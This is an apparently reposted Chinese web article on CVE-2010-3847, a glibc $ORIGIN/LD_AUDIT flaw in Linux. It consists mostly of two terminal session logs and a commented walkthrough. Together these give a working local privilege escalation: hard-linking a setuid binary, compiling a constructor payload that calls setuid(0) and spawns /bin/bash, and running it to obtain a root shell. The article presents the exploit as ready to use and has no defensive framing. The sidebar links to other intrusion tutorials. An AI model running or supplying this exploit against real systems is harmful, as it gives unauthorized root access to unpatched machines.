linux(CVE-2010-3847)漏洞和利用方法
发布时间:2014-04-28 12:39:46作者:知识屋
存在危险的linux系统:
[root@dbserver a]# cat /etc/redhat-release
CentOS release 6.3 (Final)
[root@dbserver a]# uname -a
Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux
【提权过程记录】
[root@dbserver a]# useradd test
[root@dbserver a]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@dbserver a]# su - test
[test@dbserver ~]$ ls
[test@dbserver ~]$ cd /tmp/
[test@dbserver tmp]$ mkdir exploit
[test@dbserver tmp]$ cd exploit/
[test@dbserver exploit]$ ln /bin/ping /tmp/exploit/target
[test@dbserver exploit]$ exec 3< /tmp/exploit/target
[test@dbserver exploit]$ ls -al
total 48
drwxrwxr-x 2 test test 4096 Jan 4 19:49 .
drwxrwxrwt. 37 root root 4096 Jan 4 19:49 ..
-rwsr-xr-x. 2 root root 36892 Jul 18 2011 target
[test@dbserver exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan 4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target
[test@dbserver exploit]$ cd ..
[test@dbserver tmp]$ rm -rf /tmp/exploit/
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan 4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan 4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D#按ctrl+D键
[test@dbserver tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@dbserver tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test 4163 Jan 4 19:53 /tmp/exploit
[test@dbserver tmp]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@dbserver a]# whoami
root
[root@dbserver a]# id
uid=0(root) gid=0(root) groups=0(root)
【第二次测试过程记录】
[root@91hpay ~]# useradd test
[root@91hpay ~]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@91hpay ~]# su - test
[test@91hpay ~]$ cd /tmp/
[test@91hpay tmp]$ mkdir test
[test@91hpay tmp]$ cd test/
[test@91hpay test]$ ln /bin/ping /tmp/test/test
[test@91hpay test]$ cd ..
[test@91hpay tmp]$ exec 3< /tmp/test/test
[test@91hpay tmp]$ ls -al /tmp/test/test
-rwsr-xr-x. 2 root root 41432 Nov 12 2010 /tmp/test/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan 5 12:05 /proc/19378/fd/3 -> /tmp/test/test
[test@91hpay tmp]$ rm -rf /tmp/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan 5 12:05 /proc/19378/fd/3 -> /tmp/test/test (deleted)
[test@91hpay tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
payload.c:5: error: redefinition of ‘init’
payload.c:1: note: previous definition of ‘init’ was here
[test@91hpay tmp]$ ls -l /tmp/test
ls: cannot access /tmp/test: No such file or directory
[test@91hpay tmp]$ vi payload.c
[test@91hpay tmp]$ ls -al payload.c
-rw-rw-r--. 1 test test 77 Jan 5 12:09 payload.c
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
[test@91hpay tmp]$ ls -al /tmp/test
-rwxrwxr-x. 1 test test 6020 Jan 5 12:09 /tmp/test
[test@91hpay tmp]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
[root@91hpay ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@91hpay ~]# cat /etc/redhat-release
CentOS Linux release 6.0 (Final)
[root@91hpay ~]# uname -a
Linux 91hpay.com 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux
【过程介召】
这个主要针对Linux操作,已经出来了一段时间了,只需寻找一下是否带有用户s权限的文件,若包含基本可以提权成功,
下面是具体方法:
$ORIGIN是代表在文件系统多级结构中所加载的可执行程序的位置的ELF替换序列。glibc的动态链接器展开特权应用的$ORIGIN替换的方式存在漏洞,本地用户可以通过创建到setuid应用的硬链接并通过LD_AUDIT强制展开$ORIGIN来获得权限提升,
具体过程如下:
#
在/tmp下创建可控制的目录
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义
$
ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符
$ exec 3<
/tmp/exploit/target
# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->
/tmp/exploit/target*
# 删除之前所创建的目录
$ rm -rf /tmp/exploit/
#
/proc链接仍存在,但已标记为已被删除
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64
Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
#
使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
$ cat > payload.c
void
__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit
payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15
09:22 /tmp/exploit*
# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
$
LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1#
id
uid=0(root) gid=500(taviso)
http://www.exploit-db.com/exploits/15274/
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
知识阅读
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
